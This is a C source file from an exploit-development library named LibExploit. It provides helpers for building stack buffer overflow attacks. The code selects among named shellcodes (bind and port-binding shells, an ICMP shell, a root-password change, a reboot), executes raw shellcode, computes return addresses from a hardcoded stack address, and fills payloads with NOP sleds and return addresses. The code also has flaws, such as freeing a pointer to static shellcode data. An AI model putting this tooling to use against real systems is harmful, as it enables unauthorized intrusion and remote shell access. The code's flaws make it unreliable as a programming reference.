/* LibExploit
 *
 * FILENAME : buffer.c
 * DATE     : 11/08/2002
 * CODER    : Simon Roses Femerling
 * ABSTRACT : Buffer overflow functions file.
 *
 * Copyright (C) 2002-2003. Simon Roses Femerling <sroses@ibsec.net>
*/

#include "../include/LibExploit.h"
#include "../include/shellcodes.h"

/*************************************************************
* Functions
*************************************************************/

/*
 * FUNCTION : void LibExploit_InfoShell
 * PARAMS   : char *shell
 * RETURN   : ...
 * ABSTRACT : Display a shell info on screen.
*/
void LibExploit_InfoShell(int numshell) {
	int i;
	char *shl = NULL;

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
	} else {
		printf("\nNumber : %d\n",numshell);
		printf("OS : %s\n",LibExploit_GiveOsShell(numshell));
		printf("Platform : %s\n",LibExploit_GivePlatformShell(numshell));
		printf("Type : %s\n",LibExploit_GiveTypeShell(numshell));	
		printf("Name : %s\n",LibExploit_GiveNameShell(numshell));
		printf("Size : %d\n",LibExploit_GiveSizeShell(numshell));
		shl = LibExploit_GiveHexShell(numshell);
		printf("Shell :\n");
		LibExploit_DisplayShell(shl,strlen(shl));
	}
free(shl);
}

/*
 * FUNCTION : void LibExploit_Runshell
 * PARAMS   : char *shell
 * RETURN   : ...
 * ABSTRACT : Run a shell for testing.
*/
void LibExploit_Runshell(int numshell) {
	int (*func)();

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
	} else {
		printf("\nRunning shellcode...\n");
		func = (int (*)()) LibExploit_GiveHexShell(numshell);	
		(int)(func)();
	}
}

/*
 * FUNCTION : char *LibExploit_GiveHexShell
 * PARAMS   : int numshell
 * RETURN   : The selected shellcode in hex or
	      NULL if fails to find the selected shellcode.	
 * ABSTRACT : Return the shellcode itself.
*/
char *LibExploit_GiveHexShell(int numshell) {

	switch(numshell) {
		case 1 :
			return Linux_x86_Binsh;
		break;
		case 2 :
			return Linux_x86_PortBinding;
		break;
		case 3 :
			return Linux_x86_Chroot;
		break;
		case 4 :
			return Linux_x86_TolowerShell;
		break;
		case 5 :
			return Linux_x86_ToupperShell;
		break;
		case 6 : 
			return FreeBSD_x86_Binsh;
		break;
		case 7 :
			return BSDi_x86_Binsh;
		break;
		case 8 : 
			return BSDi_x86_ToupperShell;
		break;
		case 9 :
			return HPUX_Binsh;
		break;
		case 10 :
			return UnixWare_Binsh;
		break;
		case 11 :
			return Solaris_x86_Binsh;
		break;
		case 12 :
			return Linux_Sparc_Binsh;
		break;
		case 13 :
			return Linux_Sparc_TolowerShell;
		break;
		case 14 : 
			return Solaris_Sparc_Binsh;
		break;	
		case 15 : 
			return NetBSD_x86_Binsh;
		break;
		case 16 : 
			return Windows_x86_PortBinding;
		break;
		case 17 :
			return Irix_MIPS_Binsh;
		break;
		case 18 : 
			return Linux_x86_RootPass;
		break;
		case 19 :
			return OpenBSD_x86_RootPass;
		break;
		case 20 :
			return SCO_Binsh;
		break;
		case 21 :
			return SCO_Chroot;
		break;
		case 22 :
			return Multios_x86_Binsh;
		break;
		case 23 :
			return Multios_x86_Reboot;
		break;
		case 24 :
			return Multios1_x86_Binsh;
		break;
		case 25 :
			return Linux_PPC_Binsh;
		break;
		case 26 :
			return Linux_Alpha_Binsh;
		break;
		case 27 :
			return Linux_x86_ICMPShell;
		break;
		default :
			snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
			return NULL;
		break;
	}
}

/*
 * FUNCTION : char *LibExploit_GiveSizeShell
 * PARAMS   : int numshell
 * RETURN   : The size of the seleted shellcode or
 *            -1 if fails to find the shellcode size.
 * ABSTRACT : Return the shellcode size.
*/
int LibExploit_GiveSizeShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
		return -1;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].size;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveNameShell
 * PARAMS   : int numshell
 * RETURN   : The name of the shellcode or
 *            NULL if fails to find the sellcode name.
 * ABSTRACT : Return the shellcode Name.
*/
char *LibExploit_GiveNameShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].name;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveOsShell
 * PARAMS   : int numshell
 * RETURN   : The shellcode OS or
 *            NULL if fails to find shellcode os. 
 * ABSTRACT : Return the shellcode OS.
*/
char *LibExploit_GiveOsShell(int numshell) {
	int i; 
	
	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
		return NULL;		
	}	

	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].os;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveTypeShell
 * PARAMS   : int numshell
 * RETURN   : Shellcode type or
 *            NULL if fails to find shellcode type.
 * ABSTRACT : Return the shellcode Type.
*/
char *LibExploit_GiveTypeShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].type;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GivePlatformShell
 * PARAMS   : int numshell
 * RETURN   : Shellcode platform or
 *            NULL if fails to find shellcode platform.
 * ABSTRACT : Return the shellcode Platform.
*/
char *LibExploit_GivePlatformShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "no shell with number : %d",numshell);
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].platform;
		}
	}	
}

/*
 * FUNCTION : unsinged long LibExploit_Calculateret
 * PARAMS   : char *shell, char *path 
 * RETURN   : Return address.
 * ABSTRACT : Calculate the return address.
*/
unsigned long LibExploit_Calculateret(char *shell, char *path) {
	unsigned long ret;

	ret = 0xbffffffa - strlen(shell) - strlen(path);

return(ret);
}

/*
 * FUNCTION : int LibExploit_DisplayShell
 * PARAMS   : char  *shell, int len
 * RETURN   : ...
 * ABSTRACT : Display on screen a shellcode in hex.
*/
void LibExploit_DisplayShell(char *shell, int len) {
	int i;	

	if(len < 0) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "Invalid length: %d",len);
		return;
	}
	for(i = 0; i < len; i++)
		printf("\\x%2.2x",shell[i] & 0x000000ff);
	printf("\n");
}

/*
 * FUNCTION : int LibExploit_CheckShell
 * PARAMS   : unsigned char *sh
 * RETURN   : Return 0 if no NULL if found or
 *            a positive number if shellcode contains NULLs. 
 * ABSTRACT : Check that shellcode do not contain a null char.
*/
int LibExploit_CheckShell(unsigned char *sh) {
	int count = 0;
	int shlen=0;
	int i;

	shlen = strlen(sh);
	for(i = 0; i < shlen; i++) {
		if(sh[i]=='\x00') {
			count++;	
		}
	}

return count;
}

/*
 * FUNCTION : int LibExploit_FillRet
 * PARAMS   : int eggsize, char *egg, unsigned long ret
 * RETURN   : A char * filled with return address.
 * ABSTRACT : Fill egg with return address.
*/
char *LibExploit_FillRet(int eggsize, char *egg, unsigned long ret) {
	int i;
	
	for(i = 0; i < (eggsize / 4); i++) {
		*((unsigned long *)egg + i) = ret;
	}

return egg;
}

/*
 * FUNCTION : int LibExploit_FillNOP
 * PARAMS   : int eggsize, char *egg
 * RETURN   : A char * filled with NOP.
 * ABSTRACT : Fill egg with NOP.
*/
char *LibExploit_FillNOP(int eggsize, char *egg) {
	int i;

	for(i = 0; i < eggsize / 2; i++) {
		*(egg + i) = NOP;
	}

return egg;
}

/*
 * FUNCTION : void LibExploit_ExecuteShell
 * PARAMS   : char *shl
 * RETURN   : ...
 * ABSTRACT : Execute a given shellcode.
*/
void LibExploit_ExecuteShell(char *shl) {
	void (*runs)();

	runs = (void *) shl;
	runs();
}

/* SRF E0F */
